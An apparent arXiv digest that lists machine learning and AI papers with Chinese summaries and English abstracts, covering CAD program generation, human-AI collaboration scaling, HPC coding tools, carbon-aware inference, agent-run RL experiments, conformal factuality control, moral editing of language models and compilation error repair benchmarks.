【速读】:该论文旨在解决从图像生成可执行CAD程序时,视觉几何与符号程序表示之间对齐不可靠的问题,尤其是在设计复杂度增加时,现有方法因训练数据稀缺而表现脆弱。其核心解决方案是提出几何推理反馈微调(Geometric Inference Feedback Tuning, GIFT),关键在于利用测试时计算生成高质量训练样本:通过软拒绝采样(GIFT-REJECT)保留超出精确匹配的多样化高保真程序,以及故障驱动增强(GIFT-FAIL)将近似预测转化为合成训练样本,从而提升模型在复杂几何上的鲁棒性;该方法在不依赖人工标注或专用架构的前提下,实现推理计算减少80%的同时,使平均IoU提升12%。
链接: https://arxiv.org/abs/2603.27448
作者: Giorgio Giannone,Anna Clare Doris,Amin Heyrani Nobari,Kai Xu,Akash Srivastava,Faez Ahmed
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computational Engineering, Finance, and Science (cs.CE)
备注: preprint
Abstract:Generating executable CAD programs from images requires alignment between visual geometry and symbolic program representations, a capability that current methods fail to learn reliably as design complexity increases. Existing fine-tuning approaches rely on either limited supervised datasets or expensive post-training pipelines, resulting in brittle systems that restrict progress in generative CAD design. We argue that the primary bottleneck lies not in model or algorithmic capacity, but in the scarcity of diverse training examples that align visual geometry with program syntax. This limitation is especially acute because the collection of diverse and verified engineering datasets is both expensive and difficult to scale, constraining the development of robust generative CAD models. We introduce Geometric Inference Feedback Tuning (GIFT), a data augmentation framework that leverages geometric feedback to turn test-time compute into a bootstrapped set of high-quality training samples. GIFT combines two mechanisms: Soft-Rejection Sampling (GIFT-REJECT), which retains diverse high-fidelity programs beyond exact ground-truth matches, and Failure-Driven Augmentation (GIFT-FAIL), which converts near-miss predictions into synthetic training examples that improve robustness on challenging geometries. By amortizing inference-time search into the model parameters, GIFT captures the benefits of test-time scaling while reducing inference compute by 80%. It improves mean IoU by 12% over a strong supervised baseline and remains competitive with more complex multimodal systems, without requiring additional human annotation or specialized architectures.
[AI-92] he Novelty Bottleneck: A Framework for Understanding Human Effort Scaling in AI-Assisted Work
【速读】:该论文旨在解决人类与人工智能(AI)协作效率的理论建模问题,特别是揭示在AI辅助任务中人类努力如何随任务规模变化的非直观规律。其核心问题是:为何在许多实际场景中,即使引入高性能AI代理,人类投入仍难以显著低于线性增长?解决方案的关键在于提出一个“新颖性瓶颈”(novelty bottleneck)机制——即任务中需人类判断的“新颖”部分(未被AI先验覆盖)构成不可并行化的串行组件,类似于并行计算中的阿姆达尔定律(Amdahl’s Law)。该模型假设任务可分解为原子决策,其中比例ν为新颖决策,并且规范、验证和纠错成本均随任务规模增长。由此推导出多个反直觉结论,如人类努力无平滑亚线性区间、团队最优规模随AI能力增强而减小等,从而将人类努力的线性标度归因于新颖性分数这一关键参数,而非否定AI效能提升的可能性。
链接: https://arxiv.org/abs/2603.27438
作者: Jacky Liang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:We propose a stylized model of human-AI collaboration that isolates a mechanism we call the novelty bottleneck: the fraction of a task requiring human judgment creates an irreducible serial component analogous to Amdahl’s Law in parallel computing. The model assumes that tasks decompose into atomic decisions, a fraction \nu of which are “novel” (not covered by the agent’s prior), and that specification, verification, and error correction each scale with task size. From these assumptions, we derive several non-obvious consequences: (1) there is no smooth sublinear regime for human effort it transitions sharply from O(E) to O(1) with no intermediate scaling class; (2) better agents improve the coefficient on human effort but not the exponent; (3) for organizations of n humans with AI agents, optimal team size decreases with agent capability; (4) wall-clock time achieves O(\sqrtE) through team parallelism but total human effort remains O(E) ; and (5) the resulting AI safety profile is asymmetric – AI is bottlenecked on frontier research but unbottlenecked on exploiting existing knowledge. We show these predictions are consistent with empirical observations from AI coding benchmarks, scientific productivity data, and practitioner reports. Our contribution is not a proof that human effort must scale linearly, but a framework that identifies the novelty fraction as the key parameter governing AI-assisted productivity, and derives consequences that clarify – rather than refute – prevalent narratives about intelligence explosions and the “country of geniuses in a data center.”
[AI-93] AstraAI: LLM s Retrieval and AST-Guided Assistance for HPC Codebases
【速读】:该论文旨在解决高绩效计算(High-Performance Computing, HPC)软件开发中复杂科学代码生成效率低、结构一致性难以保障的问题。解决方案的关键在于构建一个基于命令行接口(Command-Line Interface, CLI)的编码框架 AstraAI,其核心机制是通过检索增强生成(Retrieval-Augmented Generation, RAG)与抽象语法树(Abstract Syntax Tree, AST)结构分析相结合的方式,生成高保真度的提示(prompt),从而引导大语言模型(Large Language Models, LLMs)在理解上下文和代码结构的基础上进行精准的代码生成。该框架能够对源码进行局部修改并保持与周围代码的结构一致性,同时支持本地部署与云端API调用两种模式,确保在HPC环境中的灵活适配与高效执行。
链接: https://arxiv.org/abs/2603.27423
作者: Mahesh Natarajan,Xiaoye Li,Weiqun Zhang
机构: 未知
类目: Artificial Intelligence (cs.AI); Software Engineering (cs.SE)
备注: 10 pages, 5 figures
Abstract:We present AstraAI, a command-line interface (CLI) coding framework for high-performance computing (HPC) software development. AstraAI operates directly within a Linux terminal and integrates large language models (LLMs) with Retrieval-Augmented Generation (RAG) and Abstract Syntax Tree (AST)-based structural analysis to enable context-aware code generation for complex scientific codebases. The central idea is to construct a high-fidelity prompt that is passed to the LLM for inference. This prompt augments the user request with relevant code snippets retrieved from the underlying framework codebase via RAG and structural context extracted from AST analysis, providing the model with precise information about relevant functions, data structures, and overall code organization. The framework is designed to perform scoped modifications to source code while preserving structural consistency with the surrounding code. AstraAI supports both locally hosted models from Hugging Face and API-based frontier models accessible via the American Science Cloud, enabling flexible deployment across HPC environments. The system generates code that aligns with existing project structures and programming patterns. We demonstrate AstraAI on representative HPC code generation tasks within AMReX, a DOE-supported HPC software infrastructure for exascale applications.
[AI-94] CarbonEdge: Carbon-Aware Deep Learning Inference Framework for Sustainable Edge Computing
【速读】:该论文旨在解决边缘计算环境中深度学习推理任务带来的碳排放增长问题,现有框架虽优化延迟和吞吐量,但忽视了推理工作负载的环境影响。其关键解决方案是提出CarbonEdge框架,通过引入碳足迹估算与绿色调度能力扩展自适应模型分割机制,并设计一种碳效率度量的调度算法,在传统加权评分基础上增加碳效率指标,支持可调性能-碳排放权衡(通过权重扫描验证)。实验表明,CarbonEdge-Green模式相比单体执行可减少22.9%碳排放,碳效率提升1.3倍(从189.5提升至245.8次推理/克CO₂),且调度开销极低(每任务0.03ms),为分布式深度学习推理的可持续部署提供了有效工具。
链接: https://arxiv.org/abs/2603.27420
作者: Guilin Zhang,Wulan Guo,Ziqi Tan,Hailong Jiang
机构: 未知
类目: Distributed, Parallel, and Cluster Computing (cs.DC); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Deep learning applications at the network edge lead to a significant growth in AI-related carbon emissions, presenting a critical sustainability challenge. The existing edge computing frameworks optimize for latency and throughput, but they largely ignore the environmental impact of inference workloads. This paper introduces CarbonEdge, a carbon-aware deep learning inference framework that extends adaptive model partitioning with carbon footprint estimation and green scheduling apabilities. We propose a carbon-aware scheduling algorithm that extends traditional weighted scoring with a carbon efficiency metric, supporting a tunable performance–carbon trade-off (demonstrated via weight sweep). Experimental evaluations on Docker-simulated heterogeneous edge environments show that CarbonEdge-Green mode achieves a 22.9% reduction in carbon emissions compared to monolithic execution. The framework achieves 1.3x improvement in carbon efficiency (245.8 vs 189.5 inferences per gram CO2) with negligible scheduling overhead (0.03ms per task). These results highlight the framework’s potential for sustainable edge AI deployment, providing researchers and practitioners a tool to quantify and minimize the environmental footprint of distributed deep learning inference.
[AI-95] Agent -Driven Autonomous Reinforcement Learning Research: Iterative Policy Improvement for Quadruped Locomotion
【速读】:该论文旨在解决机器人强化学习(Reinforcement Learning, RL)研究中迭代实验流程高度依赖人工干预的问题,特别是在四足动物运动控制(quadruped locomotion)这一复杂、易出错的场景下,如何实现更自主的研究执行。其关键解决方案是引入一个代理驱动的自治强化学习框架,在人类提供高层次指令的前提下,由智能体(agent)自主完成从代码读取、故障诊断、奖励函数与地形配置调整、任务调度与监控、中间指标分析到下一波实验提案的完整闭环流程。该方法在Isaac Lab仿真环境中对DHAV1 12-DoF四足机器人进行了超过70次实验验证,展示了代理能够在多GPU环境下独立执行RL研究循环,并做出具有实际意义的决策(如识别PhysX死锁源、修正环境导入问题、优化奖励结构等),从而显著降低人力投入并提升研究效率。
链接: https://arxiv.org/abs/2603.27416
作者: Nimesh Khandelwal,Shakti S. Gupta
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:This paper documents a case study in agent-driven autonomous reinforcement learning research for quadruped locomotion. The setting was not a fully self-starting research system. A human provided high-level directives through an agentic coding environment, while an agent carried out most of the execution loop: reading code, diagnosing failures, editing reward and terrain configurations, launching and monitoring jobs, analyzing intermediate metrics, and proposing the next wave of experiments. Across more than 70 experiments organized into fourteen waves on a DHAV1 12-DoF quadruped in Isaac Lab, the agent progressed from early rough-terrain runs with mean reward around 7 to a best logged Wave 12 run, exp063, with velocity error 0.263 and 97% timeout over 2000 iterations, independently reproduced five times across different GPUs. The archive also records several concrete autonomous research decisions: isolating PhysX deadlocks to terrain sets containing boxes and stair-like primitives, porting four reward terms from openly available reference implementations \citedeeprobotics, rlsar, correcting Isaac Sim import and bootstrapping issues, reducing environment count for diagnosis, terminating hung runs, and pivoting effort away from HIM after repeated terrain=0.0 outcomes. Relative to the AutoResearch paradigm \citeautoresearch, this case study operates in a more failure-prone robotics RL setting with multi-GPU experiment management and simulator-specific engineering constraints. The contribution is empirical and documentary: it shows that an agent can materially execute the iterative RL research loop in this domain with limited human intervention, while also making clear where human direction still shaped the agenda.
[AI-96] Greedy Is a Strong Default: Agents as Iterative Optimizers
【速读】:该论文旨在解决传统优化算法中随机扰动生成候选解效率低、难以有效利用任务先验知识的问题。其核心挑战在于:当优化器的提案机制由随机扰动替换为具备推理能力的大语言模型(LLM)代理时,经典优化框架是否依然有效?解决方案的关键在于引入一个基于LLM的智能提案器,该代理能够结合评估诊断信息生成有指导性的候选解,从而替代传统随机扰动策略。实验表明,在多个离散、混合和连续搜索空间的任务上(如乳腺癌分类、MobileNetV3超参数优化、LoRA微调、XGBoost调参),仅使用贪心爬山法(greedy hill climbing)配合早期停止策略即可获得与复杂算法相当甚至更优的性能,且显著减少评估次数。这说明LLM所学习到的先验知识足够强大,使得接受规则的复杂性对最终结果影响有限,凸显了“简单即有效”的实践价值。
链接: https://arxiv.org/abs/2603.27415
作者: Yitao Li
机构: 未知
类目: Artificial Intelligence (cs.AI); Computation (stat.CO)
备注:
Abstract:Classical optimization algorithms–hill climbing, simulated annealing, population-based methods–generate candidate solutions via random perturbations. We replace the random proposal generator with an LLM agent that reasons about evaluation diagnostics to propose informed candidates, and ask: does the classical optimization machinery still help when the proposer is no longer random? We evaluate on four tasks spanning discrete, mixed, and continuous search spaces (all replicated across 3 independent runs): rule-based classification on Breast Cancer (test accuracy 86.0% to 96.5%), mixed hyperparameter optimization for MobileNetV3-Small on STL-10 (84.5% to 85.8%, zero catastrophic failures vs. 60% for random search), LoRA fine-tuning of Qwen2.5-0.5B on SST-2 (89.5% to 92.7%, matching Optuna TPE with 2x efficiency), and XGBoost on Adult Census (AUC 0.9297 to 0.9317, tying CMA-ES with 3x fewer evaluations). Empirically, on these tasks: a cross-task ablation shows that simulated annealing, parallel investigators, and even a second LLM model (OpenAI Codex) provide no benefit over greedy hill climbing while requiring 2-3x more evaluations. In our setting, the LLM’s learned prior appears strong enough that acceptance-rule sophistication has limited impact–round 1 alone delivers the majority of improvement, and variants converge to similar configurations across strategies. The practical implication is surprising simplicity: greedy hill climbing with early stopping is a strong default. Beyond accuracy, the framework produces human-interpretable artifacts–the discovered cancer classification rules independently recapitulate established cytopathology principles.
[AI-97] he Hidden Costs of AI-Mediated Political Outreach: Persuasion and AI Penalties in the US and UK
【速读】:该论文旨在解决人工智能(Artificial Intelligence, AI)赋能的系统在政治竞选传播中日益普及背景下,公众如何评价此类沟通方式及其潜在后果这一关键问题。现有研究多聚焦于强制性接触下态度变化,忽视了人们对AI中介传播合法性的认知。论文通过在美国和英国开展的预注册2×2实验(每国N=1,800),操控传播意图(信息型 vs. 说服型)与互动主体类型(人类 vs. AI中介),考察高重要性政治议题情境下的评价差异。其核心发现为两类“评价惩罚”:一是“说服惩罚”,即说服型传播无论是否由AI执行均被视作更具威胁性、更低效且损害组织信任;二是“AI惩罚”,表现为AI中介传播引发规范性担忧,导致在五项指标上均呈现负面评价。这表明,公众对AI传播的接受度不仅取决于其效果,更受其合法性感知和人际沟通规范的影响,这对民主沟通具有重要意义。
链接: https://arxiv.org/abs/2603.27413
作者: Andreas Jungherr,Adrian Rauchfleisch
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注:
Abstract:As AI-enabled systems become available for political campaign outreach, an important question has received little empirical attention: how do people evaluate the communicative practices these systems represent, and what consequences do those evaluations carry? Most research on AI-enabled persuasion examines attitude change under enforced exposure, leaving aside whether people regard AI-mediated outreach as legitimate or not. We address this gap with a preregistered 2x2 experiment conducted in the United States and United Kingdom (N = 1,800 per country) varying outreach intent (informational vs.~persuasive) and type of interaction partner (human vs.~AI-mediated) in the context of political issues that respondents consider highly important. We find consistent evidence for two evaluation penalties. A persuasion penalty emerges across nearly all outcomes in both countries: explicitly persuasive outreach is evaluated as less acceptable, more threatening to personal autonomy, less beneficial, and more damaging to organizational trust than informational outreach, consistent with reactance to perceived threats to attitudinal freedom. An AI penalty is consistent with a distinct mechanism: AI-mediated outreach triggers normative concerns about appropriate communicative agents, producing similarly negative evaluations across five outcomes in both countries. As automated outreach becomes more widespread, how people judge it may matter for democratic communication just as much as whether it changes minds.
[AI-98] On the Relationship between Bayesian Networks and Probabilistic Structural Causal Models
【速读】:该论文旨在解决概率图模型(特别是贝叶斯网络)与结构因果模型(Structural Causal Models, SCMs)之间的映射问题,即如何将基于专家知识或数据学习得到的贝叶斯网络转化为具有因果语义的概率结构因果模型,并探讨这种转换对网络结构和概率分布的影响。解决方案的关键在于利用线性代数和线性规划方法实现这一转化,并通过分析模型维度来研究解的存在性和唯一性条件,从而确保转换过程在数学上严谨且可操作。
链接: https://arxiv.org/abs/2603.27406
作者: Peter J.F. Lucas,Eleanora Zullo,Fabio Stella
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:In this paper, the relationship between probabilistic graphical models, in particular Bayesian networks, and causal diagrams, also called structural causal models, is studied. Structural causal models are deterministic models, based on structural equations or functions, that can be provided with uncertainty by adding independent, unobserved random variables to the models, equipped with probability distributions. One question that arises is whether a Bayesian network that has obtained from expert knowledge or learnt from data can be mapped to a probabilistic structural causal model, and whether or not this has consequences for the network structure and probability distribution. We show that linear algebra and linear programming offer key methods for the transformation, and examine properties for the existence and uniqueness of solutions based on dimensions of the probabilistic structural model. Finally, we examine in what way the semantics of the models is affected by this transformation. Keywords: Causality, probabilistic structural causal models, Bayesian networks, linear algebra, experimental software. Subjects: Artificial Intelligence (cs.AI); Machine Learning (cs.LG) Cite as: arXiv:2603.27406 [cs.AI] (or arXiv:2603.27406v1 [cs.AI] for this version) https://doi.org/10.48550/arXiv.2603.27406 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-99] Conditional Factuality Controlled LLM s with Generalization Certificates via Conformal Sampling CVPR2026
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在测试时对幻觉(hallucination)缺乏可靠控制的问题。现有基于 conformal prediction(CP)的方法通常仅提供边际覆盖保证(marginal guarantees),并依赖单一全局阈值,导致对困难提示覆盖不足、对简单提示过度覆盖,且预测集合过大。其解决方案的关键在于提出一种后处理的条件事实性控制框架(Conditional Factuality Control, CFC),通过在潜在“成功”得分上进行增强分位数回归(augmented quantile regression),定义一个连续的、特征条件化的接受阈值,并在推理时采用固定点阈值规则进行部署。理论分析表明,在交换性假设下,CFC可实现条件覆盖保证(conditional coverage guarantee),且在得分分布满足弱假设时,相比边际CP方法具有更高的样本效率;进一步提出的CFC-PAC变体通过稳定性边界调整名义风险水平,提供有限样本下条件误覆盖偏差不超过 O(log(1/δ)/N) 的概率保证。实验验证了CFC及其变体在合成数据、真实世界推理与问答基准及Flickr8k视觉-语言模型(VLM)场景中均能实现接近目标覆盖率的同时显著缩小预测集合规模。
链接: https://arxiv.org/abs/2603.27403
作者: Kai Ye,Qingtao Pan,Shuo Li
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: CVPR 2026
Abstract:Large language models (LLMs) need reliable test-time control of hallucinations. Existing conformal methods for LLMs typically provide only \emphmarginal guarantees and rely on a single global threshold, which can under-cover hard prompts, over-cover easy ones, and produce oversized prediction sets. We propose \emphConditional Factuality Control (CFC), a post-hoc conformal framework that returns \emphset-valued outputs with \emphconditional coverage guarantees. CFC defines a continuous, feature-conditional acceptance threshold through augmented quantile regression on a latent ``success’’ score, and deploys it through a fixed-point threshold rule at inference time. Theoretically, we show that CFC satisfies a conditional coverage guarantee under exchangeability and analyze its \emphefficiency, proving that, under mild assumptions on the score distributions, the conditional rule is strictly more sample-efficient than marginal conformal prediction at the same target coverage. We further derive a PAC-style variant, CFC-PAC, which shrinks the nominal risk level based on a stability bound, yielding a finite-sample certificate that the conditional miscoverage deviates from the target by at most O(\sqrt\log(1/\delta)/N) . Empirically, on synthetic data, real-world reasoning and QA benchmarks, and a Flickr8k VLM setting, CFC and CFC-PAC consistently attain near-target coverage across difficulty groups while using smaller prediction sets than CP and non-CP baselines.
[AI-100] Diagnosing Non-Markovian Observations in Reinforcement Learning via Prediction-Based Violation Scoring
【速读】:该论文旨在解决强化学习算法在实际应用中因观测不满足马尔可夫性质(Markov property)而导致性能下降的问题,尤其是当传感器存在相关噪声、延迟或部分可观测性时,传统评估指标无法区分此类非马尔可夫结构与其它次优来源。其解决方案的关键在于提出一种基于预测的评分方法:首先利用随机森林模型去除观测中的非线性马尔可夫兼容动态,随后通过岭回归检验历史观测是否能进一步降低残差预测误差,从而量化观测轨迹中的非马尔可夫程度;该得分范围为[0,1],无需构建因果图,且在多个环境和算法设置下验证了其对噪声强度的单调敏感性及指导网络架构选择的实际价值。
链接: https://arxiv.org/abs/2603.27389
作者: Naveen Mysore
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注: 15 pages, 3 figures, 5 tables. Under review at RLC 2026
Abstract:Reinforcement learning algorithms assume that observations satisfy the Markov property, yet real-world sensors frequently violate this assumption through correlated noise, latency, or partial observability. Standard performance metrics conflate Markov breakdowns with other sources of suboptimality, leaving practitioners without diagnostic tools for such violations. This paper introduces a prediction-based scoring method that quantifies non-Markovian structure in observation trajectories. A random forest first removes nonlinear Markov-compliant dynamics; ridge regression then tests whether historical observations reduce prediction error on the residuals beyond what the current observation provides. The resulting score is bounded in [0, 1] and requires no causal graph construction. Evaluation spans six environments (CartPole, Pendulum, Acrobot, HalfCheetah, Hopper, Walker2d), three algorithms (PPO, A2C, SAC), controlled AR(1) noise at six intensity levels, and 10 seeds per condition. In post-hoc detection, 7 of 16 environment-algorithm pairs, primarily high-dimensional locomotion tasks, show significant positive monotonicity between noise intensity and the violation score (Spearman rho up to 0.78, confirmed under repeated-measures analysis); under training-time noise, 13 of 16 pairs exhibit statistically significant reward degradation. An inversion phenomenon is documented in low-dimensional environments where the random forest absorbs the noise signal, causing the score to decrease as true violations grow, a failure mode analyzed in detail. A practical utility experiment demonstrates that the proposed score correctly identifies partial observability and guides architecture selection, fully recovering performance lost to non-Markovian observations. Source code to reproduce all results is provided at this https URL.
[AI-101] Defend: Automated Rebuttals for Peer Review with Minimal Author Guidance
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在自动生成学术论文反驳文本(rebuttal generation)时,常因缺乏结构化推理和事实准确性而导致反驳内容偏离核心问题、逻辑不严密的问题。其关键解决方案是提出DEFEND工具,该工具通过显式执行自动化反驳生成的推理流程,并保持作者在环(author-in-the-loop),使作者仅需以最小干预驱动推理过程,从而显著提升反驳的针对性与事实正确性,同时降低认知负荷。实验结果表明,相较于直接生成、分段生成及无作者介入的序列方法,DEFEND在事实准确性和反驳强度上均有显著改进。
链接: https://arxiv.org/abs/2603.27360
作者: Jyotsana Khatri,Manasi Patwardhan
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Rebuttal generation is a critical component of the peer review process for scientific papers, enabling authors to clarify misunderstandings, correct factual inaccuracies, and guide reviewers toward a more accurate evaluation. We observe that Large Language Models (LLMs) often struggle to perform targeted refutation and maintain accurate factual grounding when used directly for rebuttal generation, highlighting the need for structured reasoning and author intervention. To address this, in the paper, we introduce DEFEND an LLM based tool designed to explicitly execute the underlying reasoning process of automated rebuttal generation, while keeping the author-in-the-loop. As opposed to writing the rebuttals from scratch, the author needs to only drive the reasoning process with minimal intervention, leading an efficient approach with minimal effort and less cognitive load. We compare DEFEND against three other paradigms: (i) Direct rebuttal generation using LLM (DRG), (ii) Segment-wise rebuttal generation using LLM (SWRG), and (iii) Sequential approach (SA) of segment-wise rebuttal generation without author intervention. To enable finegrained evaluation, we extend the ReviewCritique dataset, creating review segmentation, deficiency, error type annotations, rebuttal-action labels, and mapping to gold rebuttal segments. Experimental results and a user study demonstrate that directly using LLMs perform poorly in factual correctness and targeted refutation. Segment-wise generation and the automated sequential approach with author-in-the-loop, substantially improve factual correctness and strength of refutation.
[AI-102] D-SPEAR: Dual-Stream Prioritized Experience Adaptive Replay for Stable Reinforcement Learninging Robotic Manipulation
【速读】:该论文旨在解决强化学习在机器人操作任务中因接触丰富动力学、长时序和训练不稳定性导致的性能下降问题,尤其是传统离策略演员-评论家算法(如SAC和TD3)在真实场景下出现策略振荡和性能崩溃的现象。其关键解决方案是提出D-SPEAR:一种双流优先经验自适应回放机制,通过解耦演员和评论家的采样策略,在共享的经验回放缓冲区中分别优化不同目标——评论家采用优先级经验回放以高效学习价值函数,而演员则基于低误差样本更新以稳定策略优化;同时引入基于TD误差变异系数的自适应锚点机制平衡均匀与优先采样,并采用Huber损失函数增强对异构奖励尺度的鲁棒性,从而显著提升训练稳定性和最终性能。
链接: https://arxiv.org/abs/2603.27346
作者: Yu Zhang,Karl Mason
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Accepted at IEEE 11th International Conference on Control and Robotics Engineering (ICCRE 2026)
Abstract:Robotic manipulation remains challenging for reinforcement learning due to contact-rich dynamics, long horizons, and training instability. Although off-policy actor-critic algorithms such as SAC and TD3 perform well in simulation, they often suffer from policy oscillations and performance collapse in realistic settings, partly due to experience replay strategies that ignore the differing data requirements of the actor and the critic. We propose D-SPEAR: Dual-Stream Prioritized Experience Adaptive Replay, a replay framework that decouples actor and critic sampling while maintaining a shared replay buffer. The critic leverages prioritized replay for efficient value learning, whereas the actor is updated using low-error transitions to stabilize policy optimization. An adaptive anchor mechanism balances uniform and prioritized sampling based on the coefficient of variation of TD errors, and a Huber-based critic objective further improves robustness under heterogeneous reward scales. We evaluate D-SPEAR on challenging robotic manipulation tasks from the robosuite benchmark, including Block-Lifting and Door-Opening. Results demonstrate that D-SPEAR consistently outperforms strong off-policy baselines, including SAC, TD3, and DDPG, in both final performance and training stability, with ablation studies confirming the complementary roles of the actorside and critic-side replay streams.
[AI-103] Beyond Completion: Probing Cumulative State Tracking to Predict LLM Agent Performance
【速读】:该论文旨在解决当前大语言模型(Large Language Model, LLM)代理能力评估中存在的重要盲区:即任务完成率(task-completion rate)作为标准指标无法有效区分模型在复杂推理过程中对中间状态(intermediate state)跟踪能力的差异。为解决此问题,作者提出了一种校准后的无草稿纸探测方法——工作记忆保真度-主动操作(Working Memory Fidelity-Active Manipulation, WMF-AM),其核心在于通过一个确定性的10任务代理电池来量化模型在累积算术状态追踪上的表现。关键创新在于引入K校准机制以维持探测器在具有判别力的范围内运行,从而克服传统固定深度基准测试在大规模模型上失去区分度的问题;实证结果显示,WMF-AM与代理性能呈显著正相关(Kendall’s tau = 0.612, p < 0.001),且该信号在控制任务完成率和模型规模后依然稳健,表明累积状态追踪能力是影响代理性能的关键因素。
链接: https://arxiv.org/abs/2603.27343
作者: Dengzhe Hou,Lingyu Jiang,Deng Li,Zirui Li,Fangzhou Lin,Kazunori D Yamada
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Task-completion rate is the standard proxy for LLM agent capability, but models with identical completion scores can differ substantially in their ability to track intermediate state. We introduce Working Memory Fidelity-Active Manipulation (WMF-AM), a calibrated no-scratchpad probe of cumulative arithmetic state tracking, and evaluate it on 20 open-weight models (0.5B-35B, 13 families) against a released deterministic 10-task agent battery. In a pre-specified, Bonferroni-corrected analysis, WMF-AM predicts agent performance with Kendall’s tau = 0.612 (p 0.001, 95% CI [0.360, 0.814]); exploratory partial-tau analyses suggest this signal persists after controlling for completion score and model scale. Three construct-isolation ablations (K = 1 control, non-arithmetic ceiling, yoked cancellation) support the interpretation that cumulative state tracking under load, rather than single-step arithmetic or entity tracking alone, is the primary difficulty source. K-calibration keeps the probe in a discriminative range where prior fixed-depth benchmarks become non-discriminative; generalization beyond this open-weight sample remains open.
[AI-104] CounterMoral: Editing Morals in Language Models
【速读】:该论文旨在解决当前语言模型在道德判断(moral judgments)编辑方面能力不足的问题,即如何有效调整模型对不同伦理框架下的道德决策输出,以更好地与人类价值观对齐。其解决方案的关键在于构建了一个名为CounterMoral的基准数据集,用于系统评估现有模型编辑技术在多维度道德情境下修改能力的有效性,从而推动面向伦理对齐的语言模型优化研究。
链接: https://arxiv.org/abs/2603.27338
作者: Michael Ripa,Jim Davies
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 7 pages (10 + 1 reference + 6 appendix). Honors thesis completed in June 2024, write-up completed in 2025
Abstract:Recent advancements in language model technology have significantly enhanced the ability to edit factual information. Yet, the modification of moral judgments, a crucial aspect of aligning models with human values, has garnered less attention. In this work, we introduce CounterMoral, a benchmark dataset crafted to assess how well current model editing techniques modify moral judgments across diverse ethical frameworks. We apply various editing techniques to multiple language models and evaluate their performance. Our findings contribute to the evaluation of language models designed to be ethical.
[AI-105] ComBench: A Repo-level Real-world Benchmark for Compilation Error Repair
【速读】:该论文旨在解决当前自动化编译错误修复(Automated Compilation Error Repair, ACER)技术在真实场景中性能评估不足的问题。现有基准测试存在诸多局限,如单一文件数据缺乏上下文、源代码多样性不足以及忽略仓库级复杂性等,导致模型表现难以反映实际开发环境中的挑战。为此,作者提出 ComBench——首个面向 C/C++ 语言的仓库级、可复现的真实世界编译错误修复基准。其关键创新在于:一是通过自动化框架从大型开源项目的 GitHub CI 历史中系统挖掘真实失败案例;二是设计高精度方法识别版本历史中的真实修复补丁(ground-truth repair patches),并构建高保真机制重现原始临时构建环境;三是所有样本均经过执行验证,确保故障可复现且修复补丁有效。ComBench 为评估现代大语言模型(LLM)在直接修复与代理式修复设置下的真实性能提供了可靠平台,并揭示了语法正确性与语义正确性之间的显著差距(例如 GPT-5 在语法修复上成功率达 73%,但语义有效性仅为 41%)。
链接: https://arxiv.org/abs/2603.27333
作者: Jia Li,Zeyang Zhuang,Zhuangbin Chen,Yuxin Su,Wei Meng,Michael R. Lyu
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注:
Abstract:Compilation errors pose pervasive and critical challenges in software development, significantly hindering productivity. Therefore, Automated Compilation Error Repair (ACER) techniques are proposed to mitigate these issues. Despite recent advancements in ACER, its real-world performance remains poorly evaluated. This can be largely attributed to the limitations of existing benchmarks, \ie decontextualized single-file data, lack of authentic source diversity, and biased local task modeling that ignores crucial repository-level complexities. To bridge this critical gap, we propose ComBench, the first repository-level, reproducible real-world benchmark for C/C++ compilation error repair. ComBench is constructed through a novel, automated framework that systematically mines real-world failures from the GitHub CI histories of large-scale open-source projects. Our framework contributes techniques for the high-precision identification of ground-truth repair patches from complex version histories and a high-fidelity mechanism for reproducing the original, ephemeral build environments. To ensure data quality, all samples in ComBench are execution-verified – guaranteeing reproducible failures and build success with ground-truth patches. Using ComBench, we conduct a comprehensive evaluation of 12 modern LLMs under both direct and agent-based repair settings. Our experiments reveal a significant gap between a model’s ability to achieve syntactic correctness (a 73% success rate for GPT-5) and its ability to ensure semantic correctness (only 41% of its patches are valid). We also find that different models exhibit distinct specializations for different error types. ComBench provides a robust and realistic platform to guide the future development of ACER techniques capable of addressing the complexities of modern software development.
[AI-106] Multimodal Forecasting for Commodity Prices Using Spectrogram-Based and Time Series Representations AAAI2026
【速读】:该论文旨在解决多变量时间序列预测中因复杂变量间依赖关系和异质外部影响因素导致的建模难题。其解决方案的关键在于提出了一种基于谱图增强的多模态融合框架(Spectrogram-Enhanced Multimodal Fusion, SEMF):首先将目标时间序列转换为Morlet小波谱图(Morlet wavelet spectrogram),利用Vision Transformer编码器提取局部化、频率感知特征;同时,通过Transformer对宏观经济等外生变量进行时序建模,捕捉多变量动态变化;最后,引入双向交叉注意力模块融合两种模态信息,在保留各自信号特性的同时建模跨模态相关性,从而实现更精准、鲁棒的多尺度模式识别与预测。
链接: https://arxiv.org/abs/2603.27321
作者: Soyeon Park,Doohee Chung,Charmgil Hong
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: AAAI 2026 Summer Symposium Series; 9 pages
